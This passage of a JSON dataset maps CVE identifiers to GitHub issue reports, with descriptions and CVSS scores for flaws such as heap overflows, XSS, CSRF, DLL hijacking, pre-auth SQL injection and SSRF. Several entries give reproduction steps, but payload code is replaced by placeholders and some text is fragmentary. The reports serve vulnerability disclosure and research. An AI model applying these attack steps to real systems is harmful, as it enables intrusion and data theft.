on): Distributor ID: Microsoft Windows Description: Windows NUMBERTAG",
  48603. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  48604. "severity": "MEDIUM",
  48605. "baseScore": 6.5,
  48606. "impactScore": 3.6,
  48607. "exploitabilityScore": 2.8
  48608. },
  48609. {
  48610. "CVE_ID": "CVE-2020-15389",
  48611. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1261",
  48612. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1261",
  48613. "Repo_new": "uclouvain/openjpeg",
  48614. "Issue_Created_At": "2020-06-28T10:06:42Z",
  48615. "description": "Heap use after free. There is a heap use after free vulnerability in PATHTAG I would also like to request a CVE if that's okay or I can do it myself if you're busy, no worries. Here is the ASAN output: FILETAG Here is the command executed to reproduce the issue: ./opj_decompress APITAG Inputs/ APITAG PGM If you would also like the files I have in the Inputs/, let me know and I can find a way to provide them.",
  48616. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H",
  48617. "severity": "MEDIUM",
  48618. "baseScore": 6.5,
  48619. "impactScore": 4.2,
  48620. "exploitabilityScore": 2.2
  48621. },
  48622. {
  48623. "CVE_ID": "CVE-2020-15470",
  48624. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/26",
  48625. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/26",
  48626. "Repo_new": "rockcarry/ffjpeg",
  48627. "Issue_Created_At": "2020-06-30T05:18:26Z",
  48628. "description": "ffjpeg APITAG function heap overflow vulnerability. ffjpeg APITAG function heap overflow vulnerability Description: There is a heap overflow bug in jfif_decode(void ctxt, BMP pb) function at PATHTAG : line NUMBERTAG An attacker can exploit this bug to cause a Denial of Service APITAG by submitting a malicious jpeg image. The bug is caused by the following dangerous memcpy calling in APITAG function: for (i NUMBERTAG i APITAG NUMBERTAG bebebebebebebebe RB NUMBERTAG fffffffdd NUMBERTAG e NUMBERTAG RC NUMBERTAG fffffffdbc NUMBERTAG ad NUMBERTAG c NUMBERTAG af NUMBERTAG c RD NUMBERTAG RSI NUMBERTAG fffffffdbc NUMBERTAG ad NUMBERTAG c NUMBERTAG af NUMBERTAG c RDI NUMBERTAG ffff NUMBERTAG ff NUMBERTAG bebebebebebebebe RBP NUMBERTAG fffffffe3d NUMBERTAG fffffffe NUMBERTAG c NUMBERTAG APITAG : push r NUMBERTAG RSP NUMBERTAG fffffffda NUMBERTAG f NUMBERTAG e0 ( APITAG : movsxd rcx,DWORD PTR [rb NUMBERTAG RIP NUMBERTAG ffffffffcd4a5e NUMBERTAG R NUMBERTAG c2a NUMBERTAG R NUMBERTAG R NUMBERTAG fff7b NUMBERTAG f3f3f3f3f3f3f3f3 R NUMBERTAG fff7b NUMBERTAG R NUMBERTAG fffffffe NUMBERTAG R NUMBERTAG R NUMBERTAG fff7b4c NUMBERTAG f1f1f1f NUMBERTAG R NUMBERTAG ffff NUMBERTAG ffee EFLAGS NUMBERTAG CARRY parity ADJUST zero SIGN trap INTERRUPT direction overflow) [ code ] Invalid $PC address NUMBERTAG ffffffffcd4a5e NUMBERTAG stack NUMBERTAG fffffffda NUMBERTAG f NUMBERTAG e0 ( APITAG : movsxd rcx,DWORD PTR [rb NUMBERTAG fffffffda NUMBERTAG b NUMBERTAG ab NUMBERTAG fffffffda NUMBERTAG e NUMBERTAG ftab NUMBERTAG dc NUMBERTAG yuv_stride NUMBERTAG yuv_height NUMBERTAG yuv_datbuf NUMBERTAG du NUMBERTAG fffffffda NUMBERTAG f NUMBERTAG e0 ( APITAG : push rbp NUMBERTAG fffffffda NUMBERTAG a NUMBERTAG fffffffda NUMBERTAG c NUMBERTAG c7b NUMBERTAG d NUMBERTAG fffffffda NUMBERTAG b NUMBERTAG e NUMBERTAG fffffffda NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffffffffcd4a5e NUMBERTAG in ?? () We ensured there is a heap overflow because of the dangerous using of memcpy function, attacker can use this bug to finish a APITAG attack. You can reproduce this heap overflow vulnerability by the follow step: ffjpeg d APITAG URLTAG",
  48629. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  48630. "severity": "MEDIUM",
  48631. "baseScore": 5.5,
  48632. "impactScore": 3.6,
  48633. "exploitabilityScore": 1.8
  48634. },
  48635. {
  48636. "CVE_ID": "CVE-2020-15500",
  48637. "Issue_Url_old": "https://github.com/maptiler/tileserver-gl/issues/461",
  48638. "Issue_Url_new": "https://github.com/maptiler/tileserver-gl/issues/461",
  48639. "Repo_new": "maptiler/tileserver-gl",
  48640. "Issue_Created_At": "2020-07-01T17:12:34Z",
  48641. "description": "Reflected XSS vulnerability in the application main page. Hi, I stumbled upon a reflected XSS in the software. It stems from reflecting unsanitized user controller input directly to the HTTP response. I initially observed this in Tileserver GL NUMBERTAG but from the looks of it it's still present in the current master . Vulnerable request example: APITAG",
  48642. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  48643. "severity": "MEDIUM",
  48644. "baseScore": 6.1,
  48645. "impactScore": 2.7,
  48646. "exploitabilityScore": 2.8
  48647. },
  48648. {
  48649. "CVE_ID": "CVE-2020-15502",
  48650. "Issue_Url_old": "https://github.com/duckduckgo/Android/issues/527",
  48651. "Issue_Url_new": "https://github.com/duckduckgo/android/issues/527",
  48652. "Repo_new": "duckduckgo/android",
  48653. "Issue_Created_At": "2019-07-09T13:02:51Z",
  48654. "description": "Domains visited get leaked to DDG servers. URLTAG This seems to be leaking all(?) the domains that users visit to your servers.",
  48655. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  48656. "severity": "HIGH",
  48657. "baseScore": 7.5,
  48658. "impactScore": 3.6,
  48659. "exploitabilityScore": 3.9
  48660. },
  48661. {
  48662. "CVE_ID": "CVE-2020-15600",
  48663. "Issue_Url_old": "https://github.com/boiteasite/cmsuno/issues/15",
  48664. "Issue_Url_new": "https://github.com/boiteasite/cmsuno/issues/15",
  48665. "Repo_new": "boiteasite/cmsuno",
  48666. "Issue_Created_At": "2020-05-30T21:38:48Z",
  48667. "description": "CSRF Vulnerability. Hi ~ I find a CSRF Vulnerability ! Version NUMBERTAG Author : Noth(\u6c88\u5f67\u74bf) Step NUMBERTAG go to FILETAG Step NUMBERTAG Use burpsuite to intercept packets Step NUMBERTAG Generate APITAG FILETAG Test Video : URLTAG No CSRF Token so that can login to the system .",
  48668. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  48669. "severity": "MEDIUM",
  48670. "baseScore": 6.5,
  48671. "impactScore": 3.6,
  48672. "exploitabilityScore": 2.8
  48673. },
  48674. {
  48675. "CVE_ID": "CVE-2020-15688",
  48676. "Issue_Url_old": "https://github.com/embedthis/goahead-gpl/issues/3",
  48677. "Issue_Url_new": "https://github.com/embedthis/goahead-gpl/issues/3",
  48678. "Repo_new": "embedthis/goahead-gpl",
  48679. "Issue_Created_At": "2020-07-15T22:40:59Z",
  48680. "description": "Digest Nonce Handling over HTTP. Overview A security vulnerability affecting APITAG versions NUMBERTAG to NUMBERTAG has been identified when using Digest authentication over HTTP. Summary A Digest authentication vulnerability has been identified due to handling of the digest \"nonce\" value. This may permit request replay for local requests over HTTP. Detail Digest authentication uses a \"nonce\" value to mitigate replay attacks. APITAG version NUMBERTAG did not validate this nonce value. APITAG versions NUMBERTAG to NUMBERTAG alidated the nonce with a fixed duration of NUMBERTAG minutes which permitted short period replays. Threat Scope An attacker with local access to traffic on HTTP networks could capture a request and replay that request. For APITAG NUMBERTAG to NUMBERTAG this replay must happen inside the NUMBERTAG minutes. Severity An attacker with access to traffic on HTTP networks could capture a request and replay that request. This could lead to unauthorized access to the service. Remedy Deploy APITAG NUMBERTAG or NUMBERTAG or later and configure ME_GOAHEAD_NONCE_DURATION to be suitably short for your needs. Advice The ME_GOAHEAD_NONCE_DURATION should be only long enough for your user to login. Further, if you must use Digest authentication you should use this only over HTTPS to eliminate the possibility of an attacker capturing and replaying the request during the ME_GOAHEAD_NONCE_DURATION period. Embedthis strongly discourages the use of Digest (and Basic) authentication. They are inherently insecure as you cannot reliably implement logout. Use form / HTTP based authentication over HTTPS with suitable ciphers such as bcrypt. Please contact Embedthis if you require further information, test code or assistance at EMAILTAG . CVE CVETAG NVD: CVETAG",
  48681. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  48682. "severity": "HIGH",
  48683. "baseScore": 8.8,
  48684. "impactScore": 5.9,
  48685. "exploitabilityScore": 2.8
  48686. },
  48687. {
  48688. "CVE_ID": "CVE-2020-15689",
  48689. "Issue_Url_old": "https://github.com/embedthis/appweb-gpl/issues/2",
  48690. "Issue_Url_new": "https://github.com/embedthis/appweb-gpl/issues/2",
  48691. "Repo_new": "embedthis/appweb-gpl",
  48692. "Issue_Created_At": "2020-05-25T23:01:39Z",
  48693. "description": "Appweb Security Alerts. Appweb Security Alerts Notification Alert Log for Appweb security issues. Subscribe to be notified when alerts are posted to log.",
  48694. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  48695. "severity": "HIGH",
  48696. "baseScore": 7.5,
  48697. "impactScore": 3.6,
  48698. "exploitabilityScore": 3.9
  48699. },
  48700. {
  48701. "CVE_ID": "CVE-2020-15807",
  48702. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/186",
  48703. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/186",
  48704. "Repo_new": "libredwg/libredwg",
  48705. "Issue_Created_At": "2020-01-14T12:30:37Z",
  48706. "description": "NULL pointer deference. Hello, I got a NULL pointer deference bug by run APITAG ERRORTAG",
  48707. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  48708. "severity": "MEDIUM",
  48709. "baseScore": 6.5,
  48710. "impactScore": 3.6,
  48711. "exploitabilityScore": 2.8
  48712. },
  48713. {
  48714. "CVE_ID": "CVE-2020-15807",
  48715. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/189",
  48716. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/189",
  48717. "Repo_new": "libredwg/libredwg",
  48718. "Issue_Created_At": "2020-01-16T11:36:57Z",
  48719. "description": "Some NULL pointer bugs. Hi, I got some bugs which you can reproduce APITAG APITAG bugs work on version APITAG and earlier .",
  48720. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  48721. "severity": "MEDIUM",
  48722. "baseScore": 6.5,
  48723. "impactScore": 3.6,
  48724. "exploitabilityScore": 2.8
  48725. },
  48726. {
  48727. "CVE_ID": "CVE-2020-15807",
  48728. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/190",
  48729. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/190",
  48730. "Repo_new": "libredwg/libredwg",
  48731. "Issue_Created_At": "2020-01-16T11:51:56Z",
  48732. "description": "Some heap_overflow bug. Hi, I got some bugs which you can reproduce APITAG APITAG bugs work on version APITAG and earlier .",
  48733. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  48734. "severity": "MEDIUM",
  48735. "baseScore": 6.5,
  48736. "impactScore": 3.6,
  48737. "exploitabilityScore": 2.8
  48738. },
  48739. {
  48740. "CVE_ID": "CVE-2020-15813",
  48741. "Issue_Url_old": "https://github.com/Graylog2/graylog2-server/issues/5906",
  48742. "Issue_Url_new": "https://github.com/graylog2/graylog2-server/issues/5906",
  48743. "Repo_new": "graylog2/graylog2-server",
  48744. "Issue_Created_At": "2019-04-24T14:39:48Z",
  48745. "description": "LDAP connector does not verify TLS certificates. Expected Behavior Graylog should verify the LDAP server certificate chain up to a trusted root, and refuse the connection when the certificate chain cannot be verified. Current Behavior Graylog accepts LDAP server certificates whose root certificate is not in any trust store. This presents a vulnerability for man in the middle attacks. Possible Solution Steps to Reproduce (for bugs NUMBERTAG Navigate to the LDAP / Active Directory configuration page NUMBERTAG Enable LDAP, choose server type 'LDAP' and enter the address of a STARTTLS enabled LDAP server, whose TLS certificate should not be verifiable by the server. Uncheck 'SSL' and APITAG self signed certificates'. Check APITAG NUMBERTAG Provide a bind DN and password in the APITAG Username' and APITAG Password' fields NUMBERTAG Click the APITAG Server Connection' button. Context We run Graylog in a Docker container, using the official Docker image URLTAG . Our LDAP server is on a different network. We would be better protected against man in the middle attacks if Graylog verifies the LDAP server certificate. Your Environment Graylog Version NUMBERTAG Elasticsearch Version NUMBERTAG APITAG Version NUMBERTAG Operating System: Debian NUMBERTAG inside Graylog Docker container Browser version: Firefo NUMBERTAG esr",
  48746. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48747. "severity": "HIGH",
  48748. "baseScore": 8.1,
  48749. "impactScore": 5.9,
  48750. "exploitabilityScore": 2.2
  48751. },
  48752. {
  48753. "CVE_ID": "CVE-2020-15861",
  48754. "Issue_Url_old": "https://github.com/net-snmp/net-snmp/issues/145",
  48755. "Issue_Url_new": "https://github.com/net-snmp/net-snmp/issues/145",
  48756. "Repo_new": "net-snmp/net-snmp",
  48757. "Issue_Created_At": "2020-07-09T09:32:21Z",
  48758. "description": "APITAG NUMBERTAG Security issues in net snmp. Dear all, In the course of a penetration test performed by our security analysts, we have noticed some security vulnerabilities in net snmp. Your deprecated bug tracker ( CVETAG redirects to Github. Sadly, Github does not support creating private issues for security relevant bugs. We would like to send you the findings in an encrypted manner to enable you to mitigate them. For encrypted communication, we can offer a web based platform hosted by us, or we can offer to encrypt our e mails via S/MIME or PGP. Please let us know which method fits you best. In order to transmit our findings via email, we will need either a public S/MIME certificate or your public PGP key of an active and trustworthy contributor of this project. As stated in our Responsible Disclosure Guideline (see URLTAG we will treat the vulnerabilities as confidential. We will grant you a time frame of NUMBERTAG days to release a patch. After that deadline, we will reserve the right to publish the vulnerabilities. Sincerely, usd responsible disclosure team APITAG About usd AG usd AG protects companies from hackers and criminals. As an accredited auditor, we consult and certify companies worldwide. Our work is as dynamic and diverse as current threats. We review IT systems, applications and processes for security vulnerabilities and help with their mitigation. With our Security Trainings, we raise security awareness; the CST Academy promotes an active dialogue and a transfer of knowledge. APITAG more security. usd APITAG Registered office NUMBERTAG Neu Isenburg Local court of Offenbach: HRB NUMBERTAG Executive Board: Andreas Duchmann, Manfred Tubach (CEO) Chairman supervisory board: Dr. Dietmar Kirchner VAT ID: DE NUMBERTAG APITAG",
  48759. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  48760. "severity": "HIGH",
  48761. "baseScore": 7.8,
  48762. "impactScore": 5.9,
  48763. "exploitabilityScore": 1.8
  48764. },
  48765. {
  48766. "CVE_ID": "CVE-2020-15866",
  48767. "Issue_Url_old": "https://github.com/mruby/mruby/issues/5042",
  48768. "Issue_Url_new": "https://github.com/mruby/mruby/issues/5042",
  48769. "Repo_new": "mruby/mruby",
  48770. "Issue_Created_At": "2020-07-20T21:23:46Z",
  48771. "description": "Heap buffer overflow in mruby interpreter. A heap buffer overflow exists in APITAG function in APITAG triggered via APITAG . The bug can be reproduced on Ubuntu NUMBERTAG bit with ASAN enabled mruby. It has been reproduced with mruby compiled with different compiler toolchains: APITAG . The POC input and steps to reproduce are provided below. POC Input CODETAG Steps to reproduce CODETAG ASAN Report ERRORTAG Authors Prashast Srivastava APITAG University) , Mathias Payer (EPFL)",
  48772. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48773. "severity": "CRITICAL",
  48774. "baseScore": 9.8,
  48775. "impactScore": 5.9,
  48776. "exploitabilityScore": 3.9
  48777. },
  48778. {
  48779. "CVE_ID": "CVE-2020-15890",
  48780. "Issue_Url_old": "https://github.com/LuaJIT/LuaJIT/issues/601",
  48781. "Issue_Url_new": "https://github.com/luajit/luajit/issues/601",
  48782. "Repo_new": "luajit/luajit",
  48783. "Issue_Created_At": "2020-07-10T23:37:23Z",
  48784. "description": "Segmentation fault in lj_err_run. Hi, we found a crash in APITAG Version NUMBERTAG Git hash: APITAG POC: ERRORTAG Stack dump: ERRORTAG",
  48785. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  48786. "severity": "HIGH",
  48787. "baseScore": 7.5,
  48788. "impactScore": 3.6,
  48789. "exploitabilityScore": 3.9
  48790. },
  48791. {
  48792. "CVE_ID": "CVE-2020-15930",
  48793. "Issue_Url_old": "https://github.com/laurent22/joplin/issues/3552",
  48794. "Issue_Url_new": "https://github.com/laurent22/joplin/issues/3552",
  48795. "Repo_new": "laurent22/joplin",
  48796. "Issue_Created_At": "2020-07-23T21:23:41Z",
  48797. "description": "Security Vulnerability. I'm opening this issue for future disclosure regarding the vulnerability reported via e mail.",
  48798. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  48799. "severity": "MEDIUM",
  48800. "baseScore": 6.1,
  48801. "impactScore": 2.7,
  48802. "exploitabilityScore": 2.8
  48803. },
  48804. {
  48805. "CVE_ID": "CVE-2020-16143",
  48806. "Issue_Url_old": "https://github.com/haiwen/seafile-client/issues/1309",
  48807. "Issue_Url_new": "https://github.com/haiwen/seafile-client/issues/1309",
  48808. "Repo_new": "haiwen/seafile-client",
  48809. "Issue_Created_At": "2020-07-22T09:30:42Z",
  48810. "description": "DLL Hijacking APITAG DLL: exchndl.dll Affected Process: FILETAG Tested on: Windows NUMBERTAG Pro NUMBERTAG ersion NUMBERTAG Description: Seafile Client ver NUMBERTAG is vulnerable to DLL hijacking because it loads APITAG from the directories listed in the %PATH% environment variable. Steps to reproduce NUMBERTAG Compile the following APITAG code and name the output dll file as APITAG NUMBERTAG Drop the APITAG in a writable directory in the %PATH% environment variable. APITAG in this case NUMBERTAG Execute Seafile by double clicking the Seafile icon on desktop or running FILETAG APITAG Files NUMBERTAG PATHTAG ) in cmd NUMBERTAG The APITAG will be executed. APITAG Code: CODETAG Screenshots: FILETAG FILETAG",
  48811. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  48812. "severity": "HIGH",
  48813. "baseScore": 7.8,
  48814. "impactScore": 5.9,
  48815. "exploitabilityScore": 1.8
  48816. },
  48817. {
  48818. "CVE_ID": "CVE-2020-16162",
  48819. "Issue_Url_old": "https://github.com/RIPE-NCC/rpki-validator-3/issues/232",
  48820. "Issue_Url_new": "https://github.com/ripe-ncc/rpki-validator-3/issues/232",
  48821. "Repo_new": "ripe-ncc/rpki-validator-3",
  48822. "Issue_Created_At": "2020-07-07T10:34:28Z",
  48823. "description": "RIPE NCC Validator by default is insecure. According to documentation the default operating mode of the RIPE NCC Validator is APITAG , this means that by default the validator operates in an insecure mode which is detrimental to the users of the software. It is beyond me why I have to open so many tickets to encourage the developers of this software to produce something that is not an immediate and urgent risk to anyone using this software.",
  48824. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  48825. "severity": "HIGH",
  48826. "baseScore": 7.5,
  48827. "impactScore": 3.6,
  48828. "exploitabilityScore": 3.9
  48829. },
  48830. {
  48831. "CVE_ID": "CVE-2020-16162",
  48832. "Issue_Url_old": "https://github.com/RIPE-NCC/rpki-validator-3/issues/162",
  48833. "Issue_Url_new": "https://github.com/ripe-ncc/rpki-validator-3/issues/162",
  48834. "Repo_new": "ripe-ncc/rpki-validator-3",
  48835. "Issue_Created_At": "2020-03-30T14:33:10Z",
  48836. "description": "An expired or missing CRL doesn't result in the manifest being considered invalid. This issue was also informally reported to RIPE NCC staff in late February NUMBERTAG It appears that RIPE NCC validator doesn't consider an expired CRL cause to consider the associated manifest and underlaying objects invalid. It logs a warning, but does not consider this situation erroneous. Theoretically a replay attack can be executed by making the CRL unavailable in a monkey in the middle scenario. The RPKI data download procedure in\u00a0RIPE NCC's Validator must assume it is collecting untrusted data, which must be verified using the certificate verification model where an expired CRL means that none of the NUMBERTAG objects pointing to the CRL can be validated or considered valid. Some more (hard to read) context is available in the RPKI standards forum at IETF via URLTAG and specifically URLTAG If the CRL is expired, the manifest & directory should not be considered eligible for further processing and the associated VRPs should not be emitted to the RTR process. Manifests and CRLs compliment each other, manifests are not a replacement for CRLs. The manifest specification assumes a sensible policy regarding CRL expiration is applied. Since RPKI does not have any other certificate revocation mechanisms other than CRLs (there is no OSCP and other tricks in the specs) I believe that ignoring the CRLs expiration date opens up RIPE NCC's validator for replay attacks which can have adverse operational consequences (aka an attacker has the ability to flip BGP routes from valid to invalid ) For transparency reasons: I'm filing this bug so I can reference it later on in a write up about how these validation issues were handled.",
  48837. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  48838. "severity": "HIGH",
  48839. "baseScore": 7.5,
  48840. "impactScore": 3.6,
  48841. "exploitabilityScore": 3.9
  48842. },
  48843. {
  48844. "CVE_ID": "CVE-2020-16163",
  48845. "Issue_Url_old": "https://github.com/RIPE-NCC/rpki-validator-3/issues/159",
  48846. "Issue_Url_new": "https://github.com/ripe-ncc/rpki-validator-3/issues/159",
  48847. "Repo_new": "ripe-ncc/rpki-validator-3",
  48848. "Issue_Created_At": "2020-03-24T13:45:25Z",
  48849. "description": "RRDP fetches should not proceed if the TLS HTTPS endpoint doesn't validate. RFC NUMBERTAG section NUMBERTAG HTTPS Considerations\" states: > Because of this, Relying Parties SHOULD do TLS certificate and host name validation when they fetch from an RRDP Repository Server. The SHOULD probably should be read as a MUST , given the validator's susceptibility to fetch from a compromised (MITM'ed) RRDP service especially when combined with a partial withholding attack. Note: checking the TLS certs of the RRDP channel makes MITM's harder but not impossible! More work is needed in the validation procedure regardless of fixing this TLS RRDP issue. Recommendation: APITAG should be changed to APITAG in the default distribution & settings. It is hard to imagine a scenario where one would want to disable TLS certificate validation.",
  48850. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  48851. "severity": "CRITICAL",
  48852. "baseScore": 9.1,
  48853. "impactScore": 5.2,
  48854. "exploitabilityScore": 3.9
  48855. },
  48856. {
  48857. "CVE_ID": "CVE-2020-16164",
  48858. "Issue_Url_old": "https://github.com/RIPE-NCC/rpki-validator-3/issues/158",
  48859. "Issue_Url_new": "https://github.com/ripe-ncc/rpki-validator-3/issues/158",
  48860. "Repo_new": "ripe-ncc/rpki-validator-3",
  48861. "Issue_Created_At": "2020-03-23T17:35:24Z",
  48862. "description": "Missing files don't result in a manifest being considered invalid. In a MITM scenario where an attacker intercepts and manipulates the rsync channel (for example strategically withholding certain .roa files from the view of the validator being attacked), the resulting set of VRPs will be incomplete and can cause severe operational issues. When a manifest is valid (manifest is parsable, CRL exists is valid (also not expired), and manifest is signed with keys not revoked by the CRL), and references files which do not exist in the repository at hand, the publication point should be considered compromised. So in the case of APNIC where an End User (self hosted) RPKI publication point misses a few .roa files, the validator can proceed to consider all data from all RPs it could reach valid, except the data from the publication point where files were missing. In other words: if one or a few files are missing from the repository, the repository should be considered 'down', and no attempt should be made to start guessing what can be salvaged and what not.",
  48863. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
  48864. "severity": "HIGH",
  48865. "baseScore": 7.4,
  48866. "impactScore": 5.2,
  48867. "exploitabilityScore": 2.2
  48868. },
  48869. {
  48870. "CVE_ID": "CVE-2020-16165",
  48871. "Issue_Url_old": "https://github.com/chillzhuang/SpringBlade/issues/9",
  48872. "Issue_Url_new": "https://github.com/chillzhuang/springblade/issues/9",
  48873. "Repo_new": "chillzhuang/springblade",
  48874. "Issue_Created_At": "2020-07-25T13:56:47Z",
  48875. "description": "Pre auth SQL injection. tl;dr Flaws in DAO/DTO implementation allows SQLi in order by clause. User token and/or password hash disclosed in pre auth APIs of which are vulnerable to SQLi above as well. detail APITAG is exposed by default install. For instance, the demo site. FILETAG Refresh token can be used to exchange for a valid jwt ticket, or in a different way to compromise user account, log in with credential cracked from leaking md5 hash. Before actually stepping into the system, let's see what's else we could find on this API. Request handling looks a lot like this CODETAG APITAG casts a few params to Int and replace 'bad words' with blank string in 'ascs' and 'desc' (which are then pasted into order by clause) CODETAG the APITAG thing is a sort of indicator for batis data model, apart from being a type indicator it is in charge of building statement. after a few delegates and overrides it gets invoked in the way below CODETAG Only seen tokenization stuffs in APITAG At this stage, pre auth visitors can perform SQLi by providing malicious query.get FILETAG this gets you current db user. APITAG post script the actul PATHTAG sets a fixed \"desc\", is vulne to malicious \"ascs\" only. APITAG",
  48876. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48877. "severity": "CRITICAL",
  48878. "baseScore": 9.8,
  48879. "impactScore": 5.9,
  48880. "exploitabilityScore": 3.9
  48881. },
  48882. {
  48883. "CVE_ID": "CVE-2020-16248",
  48884. "Issue_Url_old": "https://github.com/prometheus/blackbox_exporter/issues/669",
  48885. "Issue_Url_new": "https://github.com/prometheus/blackbox_exporter/issues/669",
  48886. "Repo_new": "prometheus/blackbox_exporter",
  48887. "Issue_Created_At": "2020-08-03T02:20:15Z",
  48888. "description": "Prometheus Blackbox Exporter through NUMBERTAG allows /probe?target= SSRF. . SSRF Vulnerablity During the company's penetration test, it was found that the Blackbox > Exporter service was opened on the Internet, which led to the ssrf > detection of the company's internal network > > Set up the Blackbox Exporter test environment, and then visit: > > URLTAG > > > Blackbox Exporter logs service jump will be displayed > URLTAG > > As long as the target is replaced, the service of detecting internal > service weakness can be realized > > Also supports other protocols > Blackbox Exporter is a service to test the state of network > connectivity. If it is configured incorrectly, SSRF can detect weak > services and applications in the internal network. CVETAG",
  48889. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
  48890. "severity": "MEDIUM",
  48891. "baseScore": 5.8,
  48892. "impactScore": 1.4,
  48893. "exploitabilityScore": 3.9
  48894. },
  48895. {
  48896. "CVE_ID": "CVE-2020-16252",
  48897. "Issue_Url_old": "https://github.com/ankane/field_test/issues/28",
  48898. "Issue_Url_new": "https://github.com/ankane/field_test/issues/28",
  48899. "Repo_new": "ankane/field_test",
  48900. "Issue_Created_At": "2020-08-04T20:05:09Z",
  48901. "description": "CSRF Vulnerability with Non Session Based Authentication. The Field Test dashboard is vulnerable to cross site request forgery (CSRF) with non session based authentication methods. This vulnerability has been assigned the CVE identifier CVETAG . Versions Affected NUMBERTAG to NUMBERTAG Fixed Versions NUMBERTAG Impact The Field Test dashboard is vulnerable to CSRF with non session based authentication methods, like basic authentication. Session based authentication methods (like Devise's default authentication) are not affected. A CSRF attack works by getting an authorized user to visit a malicious website and then performing requests on behalf of the user. In this instance, a single endpoint is affected, which allows for changing the variant assigned to a user. All users running an affected release should upgrade immediately. Technical Details Field Test uses the APITAG method from Rails to prevent CSRF. However, this defaults to APITAG , which has no effect on non session based authentication methods. This has been changed to ERRORTAG .",
  48902. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  48903. "severity": "MEDIUM",
  48904. "baseScore": 4.3,
  48905. "impactScore": 1.4,
  48906. "exploitabilityScore": 2.8
  48907. },
  48908. {
  48909. "CVE_ID": "CVE-2020-16253",
  48910. "Issue_Url_old": "https://github.com/ankane/pghero/issues/330",
  48911. "Issue_Url_new": "https://github.com/ankane/pghero/issues/330",
  48912. "Repo_new": "ankane/pghero",
  48913. "Issue_Created_At": "2020-08-04T19:31:45Z",
  48914. "description": "CSRF Vulnerability. APITAG is vulnerable to cross site request forgery (CSRF). This vulnerability has been assigned the CVE identifier CVETAG . Versions Affected NUMBERTAG and below Fixed Versions NUMBERTAG Impact The APITAG dashboard is vulnerable to cross site request forgery (CSRF). This affects the Docker image, Linux packages, and in specific cases, the Rails gem. The Rails gem is vulnerable with non session based authentication methods like basic authentication session based authentication methods (like Devise's default authentication) are not affected. A CSRF attack works by getting an authorized user to visit a malicious website and then performing requests on behalf of the user. In this instance, actions include NUMBERTAG Canceling running queries NUMBERTAG Running EXPLAIN on queries (without seeing the results, but can be used for denial of service and other attacks NUMBERTAG Resetting query stats (running APITAG ) All users running an affected release should upgrade immediately. Credits Thanks to Heiko Webers of FILETAG for reporting this. Technical Details APITAG uses the APITAG method from Rails to prevent CSRF. However, this defaults to APITAG , which has no effect on non session based authentication methods. This has been changed to ERRORTAG .",
  48915. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
  48916. "severity": "HIGH",
  48917. "baseScore": 8.1,
  48918. "impactScore": 5.2,
  48919. "exploitabilityScore": 2.8
  48920. },
  48921. {
  48922. "CVE_ID": "CVE-2020-16254",
  48923. "Issue_Url_old": "https://github.com/ankane/chartkick/issues/546",
  48924. "Issue_Url_new": "https://github.com/ankane/chartkick/issues/546",
  48925. "Repo_new": "ankane/chartkick",
  48926. "Issue_Created_At": "2020-08-04T20:29:47Z",
